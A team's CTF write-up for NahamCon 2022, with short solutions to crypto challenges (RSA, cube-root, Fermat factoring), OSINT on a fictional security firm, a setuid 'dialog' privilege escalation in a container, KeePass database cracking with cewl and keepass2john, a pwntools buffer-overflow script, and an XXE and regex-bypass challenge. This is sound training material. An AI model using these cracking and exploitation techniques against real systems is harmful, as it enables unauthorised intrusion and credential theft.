Nahamcon 2022



Solved BY : Avantika

We are given a connection to server, where we are presented with some options as follows

options do as their description says, we will jump right into the quiz

Quiz #1 is pretty simple RSA challenge, here is the script to solve that

from Crypto.Util.number import inverse
c = ciphertext
e = e
n = n
#find p and q using
p = p
q = q
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)

Quiz #2 is small e attack, we just need to take cube-root of the cipher-text and we get the plain-text

from decimal import Decimal
import decimal
def cube_root(x):
    return Decimal(x) ** (Decimal(1) / Decimal(3))
with decimal.localcontext() as context:
    context.prec = 150

Quiz #3 is fermat-attack as the primes chosen were too close

import gmpy2
import math
n = n

def fermat_factor(n):
    assert n % 2 != 0

    a = gmpy2.isqrt(n)
    b2 = gmpy2.square(a) - n

    while not gmpy2.is_square(b2):
        a += 1
        b2 = gmpy2.square(a) - n

    p = a + gmpy2.isqrt(b2)
    q = a - gmpy2.isqrt(b2)

    return int(p), int(q)

(p, q) = fermat_factor(n)

print("p = {}".format(p))
print("q = {}".format(q))

Solving these two gives us our flag.


Solved By : Avantika

In this challenge we are given the following script along with the cipher text

import random

flag = open('flag.txt', 'r').read()
ct = ''
k = random.randrange(0,0xFFFD)
for c in flag:
    ct += chr((ord(c) + k) % 0xFFFD)

open('out', 'w').write(ct)



Looking at the script we can see that a random integer is being assigned to the variable k , to find this integer, we can do a simple trick, as we know that first letter of flag, is going to be f i.e 102 in ASCII chart , we can brute-force to find k, here is the brute-force script

ct = '饇饍饂饈饜餕饆餗餙饅餒餗饂餗餒饃饄餓饆饂餘餓饅餖饇餚餘餒餔餕餕饆餙餕饇餒餒饞飫'

for k in range(0, 65533):
    goal = ct[0]
    goal = ord(goal)
    num = (102 - k) % 65533
    if goal == num:

Script simple takes the first character of cipher-text, gets the ASCII value to and assigns that to goalthen just “reverses” what the script did

Next part is pretty easy, we just perform the same operation again on the cipher-text and we would get the flag

k = 26396
for char in ct:
    print(chr((ord(char) + k) % 65533), end='')

This prints out our flag.

Keeber Security Group

Keeber 1

Solved by: Starry-Lord

By searching for keeber security group on google we quickly found a valid domain at, then finding the registrant name online gave the flag.

Keeber 2

Solved by: Starry-Lord

We can check for past versions of most website, and we find they fired Tiffany Douglas:

Keeber 3

Solved by: Starry-Lord

Here is their github:

We can see at this point in time a file called asana_secret.txt was uploaded to the github by mistake, Tiffany made a typo in the .gitignore file which ended up preventing asana_secret.tx from being commited (which doesn’t exist). Looking up Asana, I read we can query other users e-mails if we invite them to a group we create. It didn’t help us here but still noticeable detail. Researching more on asana, I discovered it has an API which allows to get information back with the right Authorization Header.

Keeber 4

Solved by: Starry-Lord

To open this kbdx file we can use keepass2 on Kali Systems, after grabbing it from the github.

To make a custom wordlist from public facing information I used cewl:

cewl > code_reviews.txt 

I did so for each text files in the /security-evaluation-workflow/ repository.

Then I had to turn it into a crackable format with keepass2john:

starlord@HAL-9000:~/Bureau/Fun/Nahamcon2022/Keeber$ keepass2john ksg_passwd_db.kdbx 


password: craccurrelss

Keeber 5

Solved by: Starry-Lord

Clone the repository /security-evaluation-workflow/ and check commit logs.


Keeber 6

Solved by: Starry-Lord

Lost a piece of my soul and made a yelp account, to look for reviews by e-mail.

Keeber 7

Solved too late by: Starry-Lord


This online tool showed a mention about myspace, so I sacrificed another bit of my soul and made a MySpace account. This allows us to find the flag and a new username:

Keeber 8

Solved too late by: Starry-Lord

myspace username: cereal_lover1990

A quick search for the username with another online tool reveals a matching user on

content of Chump List:


To be and not to be

Solved by : thewhiteh4t

This challenge excepts only alphabets and character length is 3

Found the solution here :


Solved By : Starry-Lord, Taz, Legend, thewhiteh4t

This one involved an ssh connection to a Linux machine. We could find kubernetes secrets in the usual /run/secrets/ which revealed it was a kubernetes container. After a bit of enumeration I learned about CVE-2022-0185 which allows us to escape the container, but it looked like it had been patched.

Further enumeration led me to find a few sticky bits on some of the binaries in /usr/bin. I looked them up to find a fitting one called dialog, which will allow us to read files with elevated permissions:

user@gossip-9d9e950dfdcbda12-64cdd78676-psbqk:/usr/bin$ ls -la dialog 
-rwsr-sr-x 1 root root 260736 Jan  3 23:30 dialog

After a bit of cleaning up we can use this key to login as root.

Steam Locomotive

Solved by: Legend

In this challenge we were provided with a ssh credentials to get the flag, with a hint that ls command was getting mistyped accidentally.

When I connect to the ssh it was playing an animation of steam engine, sl command which is Steam Locomotive, and then when the animation was over then immediately the session was getting disconnected.

To retrieve the flag we needed to read the flag and since ssh allows direct command execution during connection we can read the flag using that.



Solved by: Legend

In this challenge an andorid APK was given.

Initially I installed the apk on android vritual device to check what’s the app is about and to know what’s happening with the app. But there was nothing informative.

Then with the help of apktool I decompiled the apk to see what’s the functioning of the app and also to look for flag string. Their were lot’s of sub-directories so I juse used grep to see if the flag might be present in plain text, and got the flag.



Solved By : thewhiteh4t

#!/usr/bin/env python3

from pwn import *

host = ''
port = 32628

offset = 120
junk = b'A' * offset
win_addr = 0x4011c9

le_win_addr = p64(win_addr, endianness='little')
payload = junk + le_win_addr

conn = remote(host, port)


crash override

solved by : thewhiteh4t

Basic buffer overflow challenge. In the c code we can see that buffer size is 2048, I just sent 2060 “A” and got the flag

exit vim

Solved By : Starry-Lord

ctrl+c , semi-colon(type :), q char, enter


Solved By : Starry-Lord

ctrl+d to escape the python like shell


Solved By : Starry-Lord


Solved By : Starry-Lord

Used CyberChef and python to decode the strings


Solved By : nigamelastic

the input file has the following content


seems like a hex code: on converting from hex gives u the following the following


IHDRoo��Ø��#�PLTEÿÿÿ¥ÙŸÝ�tRNSÿÿȵßÇ        pHYs�����ÒÝ~ü�%IDAT8ÕÔ1ŽÃ ��б\Ð%�@škÐq%û�¶÷�Εè¸�’/@:
ú�ÌD‹¯k°D¬ò.urãfê*��vÁ炝L�'—ÈÔN®‘Öb»(uŽõ�í+È7D¾s´˜¯ôßð�öZ~�öOf²dxóÇî:è�¬%�9Vy/tqãW”‡�ñØ[l4y�³²ûsS¥;63¢øs`•Rê�ÓÅð~Fõžw�omJv:% IÚ�Ý"«D¾8(%Í¥ƒ’†‚��SgD�Ö9 þ¬³•Ý��Q‰‘=!¤ìX%:vòih¯LTâ-,�•äìY'®Rд4<óU‰…ðÃq��ßB"':ñ~Ñ-hª¢³åÛ:V²Ñù¹_î§ø
iõ7wnø        —IEND®B`

We can clearly see its a PNG file so just convert it to png and it will give u the following QR code

Scanning the code will give u the flag aka



Jurrassic Park

Solved By : Starry-Lord

This easy challenge made me (finally) realise John Hammond has the same name as the Owner of the Jurrassic Park in the first movies.

Pretty cool site by the way:

content of /robots.txt

User-agent: *
Disallow: /ingen/

The flag was here


Solved By : nigamelastic

The challenge mentions the following:

The flag is in /var/www

on accessing the website we see a normal interface with xml parsing as a service

from the mentioning of XML it seems that this might be an XXE

Since we already know the locaiton of the flag I used the following payload:

I simply uploaded it to the trial tab:

and then used view XML tab to view my xml

This would give flag


Solved By : nigamelastic

The Challenge contains a python file, On opening the python file u can clearly see som regex fu going on:

going through the code and testing it on the live link, u can see that it ignores the first letter if its upper case, and makes a logic around it. Its better if u view it in a debugging tool , I use regex101

I also went through the official documentation ( to see if there are any special characters that can be used. the most interesting one was | As per the documentation:

A|B, where A and B can be arbitrary REs, creates a regular expression that will match either A or B. An arbitrary number of REs can be separated by the '|' in this way. This can be used inside groups (see below) as well. As the target string is scanned, REs separated by '|' are tried from left to right. When one pattern completely matches, that branch is accepted. This means that once A matches, B will not be tested further, even if it would produce a longer overall match. In other words, the '|' operator is never greedy. To match a literal '|', use \|, or enclose it inside a character class, as in [|].

Once u go through it with a flag{randomString} u will find that the following regex would allow it.

So now we remove our initial regex and just add the ones we used aka |flag{.*}| which gives u the flag